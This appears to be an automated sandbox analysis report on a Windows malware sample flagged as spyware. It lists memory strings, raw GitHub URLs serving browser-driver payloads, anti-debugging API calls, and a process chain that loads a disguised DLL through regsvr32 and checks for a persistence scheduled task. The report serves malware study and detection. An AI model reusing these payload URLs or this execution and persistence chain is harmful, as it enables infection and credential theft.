      Source: powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 0000000A.00000002.945864209.0000026600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.0000029380001000.00000004.00000800.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2137187188.000000000373B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.0000020880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: qmgr.db.17.drString found in binary or memory: http://storage.googleapis.com/update-delta/ggkkehgbnfjpeggfpleeakpidbkibbmn/2021.9.13.1142/2021.9.7.
      Source: qmgr.db.17.drString found in binary or memory: http://storage.googleapis.com/update-delta/jamhcnnkihinmdlkakkaopbjbbcngflc/96.0.4648.2/96.0.4642.0/
      Source: qmgr.db.17.drString found in binary or memory: http://storage.googleapis.com/update-delta/khaoiebndkojlmppeemjhbpbandiljpe/45/43/19f2dc8e4c5c5d0383
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
      Source: powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1145750310.00000293F4118000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
      Source: 8n26gvrXUM.exe, 00000000.00000003.881850634.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.exe, 00000000.00000003.881404803.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000001.00000000.883261373.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-JVPOA.tmp.7.dr, 8n26gvrXUM.tmp.6.dr, 8n26gvrXUM.tmp.0.drString found in binary or memory: http://www.innosetup.com/
      Source: powershell.exe, 0000000A.00000002.968534001.0000026677F96000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1139170748.00000293F3A50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1588032598.000000001BB8E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2141694370.000000001BB8F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1131585737.00000208F6490000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139398628.000001C713899000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139657410.000001C713902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
      Source: 8n26gvrXUM.exe, 00000000.00000003.881850634.000000007FD20000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.exe, 00000000.00000003.881404803.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000001.00000000.883261373.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-JVPOA.tmp.7.dr, 8n26gvrXUM.tmp.6.dr, 8n26gvrXUM.tmp.0.drString found in binary or memory: http://www.remobjects.com/ps
      Source: powershell.exe, 0000000C.00000002.1145750310.00000293F4143000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://.VisualC
      Source: powershell.exe, 0000000A.00000002.945864209.0000026600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.0000029380001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.0000020880001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
      Source: powershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
      Source: powershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: https://d.symcb.com/cps0%
      Source: is-J08NI.tmp.7.drString found in binary or memory: https://d.symcb.com/rpa0
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: https://d.symcb.com/rpa0.
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: https://d.symcb.com/rpa06
      Source: regsvr32.exe, regsvr32.exe, 0000000E.00000002.2147102625.00007FFD34996000.00000002.00000001.01000000.00000009.sdmp, is-J08NI.tmp.7.drString found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
      Source: qmgr.db.17.drString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dll
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/chromedriver.exe
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exe
      Source: powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1145750310.00000293F4118000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
      Source: powershell.exe, 0000000A.00000002.945864209.000002660022C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938022D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.000002088022C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
      Source: qmgr.db.17.drString found in binary or memory: https://msftspeechmodelsprod.azureedge.net/SR/SV10-EV100/en-us-n/MV101/naspmodelsmetadata.xmlPC:
      Source: powershell.exe, 0000000A.00000002.945864209.000002660148C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.963153072.0000026610078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1095561017.0000029390077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.997278136.000002938149C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1110863403.0000020890077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1026201200.0000020881496000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
      Source: powershell.exe, 0000000A.00000002.968534001.0000026677F96000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1139170748.00000293F3A50000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000003.1588032598.000000001BB8E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 0000000E.00000002.2141694370.000000001BB8F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1131585737.00000208F6490000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139398628.000001C713899000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.2139657410.000001C713902000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
      Source: regsvr32.exe, 0000000E.00000002.2137187188.00000000033D8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354rCannot
      Source: 8n26gvrXUM.tmp, 00000007.00000002.923923964.000000000018F000.00000004.00000010.00020000.00000000.sdmp, 8n26gvrXUM.tmp, 00000007.00000003.922467829.000000000366E000.00000004.00001000.00020000.00000000.sdmp, is-J08NI.tmp.7.drString found in binary or memory: https://www.digicert.com/CPS0

      System Summary

      barindex
      Source: 14.2.regsvr32.exe.2f9131e.1.raw.unpack, KfF5HsZ6WWf1NQYJSA.csLarge array initialization: HcZdqQ5U4: array initializer size 305328
      Source: 14.2.regsvr32.exe.3130000.2.raw.unpack, KfF5HsZ6WWf1NQYJSA.csLarge array initialization: HcZdqQ5U4: array initializer size 305328
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD348EA040 memset,GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,NtGetContextThread,NtSetContextThread,NtClose,9_2_00007FFD348EA040
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD348EA040 memset,GetModuleHandleA,GetModuleHandleA,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,AddVectoredExceptionHandler,NtQueryInformationProcess,NtQuerySystemInformation,NtOpenThread,RtlFreeHeap,NtGetContextThread,NtTraceControl,NtSetContextThread,NtClose,14_2_00007FFD348EA040
      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpCode function: 1_2_02391D201_2_02391D20
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpCode function: 1_2_023912601_2_02391260
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD3493EFF09_2_00007FFD3493EFF0
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD349409409_2_00007FFD34940940
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD348E20D09_2_00007FFD348E20D0
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD349365409_2_00007FFD34936540
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD349926409_2_00007FFD34992640
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD348F06509_2_00007FFD348F0650
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD34983DA09_2_00007FFD34983DA0
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD34905DD09_2_00007FFD34905DD0
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD349387409_2_00007FFD34938740
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD3490C7409_2_00007FFD3490C740
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD349066609_2_00007FFD34906660
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD349920009_2_00007FFD34992000
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD348EF7E09_2_00007FFD348EF7E0
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD3491FFE09_2_00007FFD3491FFE0
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD348EA0409_2_00007FFD348EA040
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD349358909_2_00007FFD34935890
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD348E90609_2_00007FFD348E9060
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD348F08809_2_00007FFD348F0880
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD348F09E09_2_00007FFD348F09E0
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD348E6A509_2_00007FFD348E6A50
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD3498E9809_2_00007FFD3498E980
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD349161609_2_00007FFD34916160
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD3496E9709_2_00007FFD3496E970
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD34945AF09_2_00007FFD34945AF0
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD349493209_2_00007FFD34949320
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD349792A09_2_00007FFD349792A0
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD34970BF09_2_00007FFD34970BF0
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD348EB4309_2_00007FFD348EB430
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD3493CB909_2_00007FFD3493CB90
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD349833909_2_00007FFD34983390
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD3498C3B09_2_00007FFD3498C3B0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFCF448713D10_2_00007FFCF448713D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFCF4485DD510_2_00007FFCF4485DD5
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFCF448923D10_2_00007FFCF448923D
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFCF45533F110_2_00007FFCF45533F1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFCF44716D212_2_00007FFCF44716D2
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFCF4479AED12_2_00007FFCF4479AED
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFCF454409712_2_00007FFCF4544097
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFCF454306112_2_00007FFCF4543061
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFCF454681D12_2_00007FFCF454681D
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD3493EFF014_2_00007FFD3493EFF0
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD348EA04014_2_00007FFD348EA040
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD3494094014_2_00007FFD34940940
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD348E20D014_2_00007FFD348E20D0
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD3493654014_2_00007FFD34936540
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD3499264014_2_00007FFD34992640
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD348F065014_2_00007FFD348F0650
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD34983DA014_2_00007FFD34983DA0
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD34905DD014_2_00007FFD34905DD0
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD3493874014_2_00007FFD34938740
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD3490C74014_2_00007FFD3490C740
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD3490666014_2_00007FFD34906660
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD3499200014_2_00007FFD34992000
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD348EF7E014_2_00007FFD348EF7E0
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD3491FFE014_2_00007FFD3491FFE0
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD3493589014_2_00007FFD34935890
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD348E906014_2_00007FFD348E9060
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD348F088014_2_00007FFD348F0880
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD348F09E014_2_00007FFD348F09E0
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD348E6A5014_2_00007FFD348E6A50
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD3498E98014_2_00007FFD3498E980
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD3491616014_2_00007FFD34916160
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD3496E97014_2_00007FFD3496E970
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD34945AF014_2_00007FFD34945AF0
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD3494932014_2_00007FFD34949320
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD349792A014_2_00007FFD349792A0
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD34970BF014_2_00007FFD34970BF0
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD348EB43014_2_00007FFD348EB430
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD3493CB9014_2_00007FFD3493CB90
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD3498339014_2_00007FFD34983390
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFD3498C3B014_2_00007FFD3498C3B0
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02FE221914_2_02FE2219
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_02FE342614_2_02FE3426
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFCF449A57514_2_00007FFCF449A575
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFCF449F74D14_2_00007FFCF449F74D
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFCF44966F214_2_00007FFCF44966F2
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFCF4499E6714_2_00007FFCF4499E67
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFCF4499EB514_2_00007FFCF4499EB5
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFCF449CFAD14_2_00007FFCF449CFAD
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFCF44ADC0114_2_00007FFCF44ADC01
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFCF44930B914_2_00007FFCF44930B9
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFCF469308D14_2_00007FFCF469308D
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFCF4691E4214_2_00007FFCF4691E42
      Source: C:\Windows\System32\regsvr32.exeCode function: 14_2_00007FFCF469003414_2_00007FFCF4690034
      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFD348EFE90 appears 48 times
      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00007FFD3497C350 appears 40 times
      Source: 8n26gvrXUM.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
      Source: 8n26gvrXUM.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: 8n26gvrXUM.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
      Source: 8n26gvrXUM.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: 8n26gvrXUM.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
      Source: is-JVPOA.tmp.7.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
      Source: is-JVPOA.tmp.7.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
      Source: is-J08NI.tmp.7.drStatic PE information: Number of sections : 11 > 10
      Source: 8n26gvrXUM.exe, 00000000.00000003.881404803.0000000002607000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs 8n26gvrXUM.exe
      Source: 8n26gvrXUM.exe, 00000000.00000003.881850634.000000007FE33000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameshfolder.dll~/ vs 8n26gvrXUM.exe
      Source: 8n26gvrXUM.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
      Source: 14.2.regsvr32.exe.2f9131e.1.raw.unpack, KfF5HsZ6WWf1NQYJSA.csCryptographic APIs: 'CreateDecryptor'
      Source: 14.2.regsvr32.exe.3130000.2.raw.unpack, KfF5HsZ6WWf1NQYJSA.csCryptographic APIs: 'CreateDecryptor'
      Source: classification engineClassification label: mal100.spyw.evad.winEXE@27/31@0/2
      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00007FFD348EB900 CreateToolhelp32Snapshot,memset,Process32FirstW,memcpy,memcpy,CloseHandle,GetCurrentProcessId,DebugActiveProcess,GetCurrentProcess,TerminateProcess,CloseHandle,CloseHandle,GetModuleHandleA,GetProcAddress,GetCurrentProcessId,DebugActiveProcess,GetCurrentProcess,TerminateProcess,9_2_00007FFD348EB900
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpFile created: C:\Users\user\AppData\Local\unins000.datJump to behavior
      Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\GlamorousBath
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:728:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8532:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9048:120:WilError_03
      Source: C:\Windows\System32\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\04cc3a8c0bf2
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8532:120:WilError_03
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9048:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:728:304:WilStaging_02
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3560:304:WilStaging_02
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeFile created: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmpJump to behavior
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Windows\System32\regsvr32.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
      Source: 8n26gvrXUM.exeReversingLabs: Detection: 50%
      Source: 8n26gvrXUM.exeVirustotal: Detection: 55%
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeFile read: C:\Users\user\Desktop\8n26gvrXUM.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\8n26gvrXUM.exe "C:\Users\user\Desktop\8n26gvrXUM.exe"
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeProcess created: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp "C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmp" /SL5="$103F0,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe"
      Source: C:\Users\user\AppData\Local\Temp\is-MPMS8.tmp\8n26gvrXUM.tmpProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C timeout /T 3 & "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 3
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\Desktop\8n26gvrXUM.exe "C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES
      Source: C:\Users\user\Desktop\8n26gvrXUM.exeProcess created: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp "C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmp" /SL5="$30432,1083099,161792,C:\Users\user\Desktop\8n26gvrXUM.exe" /VERYSILENT /SUPPRESSMSGBOXES
      Source: C:\Users\user\AppData\Local\Temp\is-DN23D.tmp\8n26gvrXUM.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv"
      Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\netapi32_1.drv"
      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\netapi32_1.drv' }) { exit 0 } else { exit 1 }"
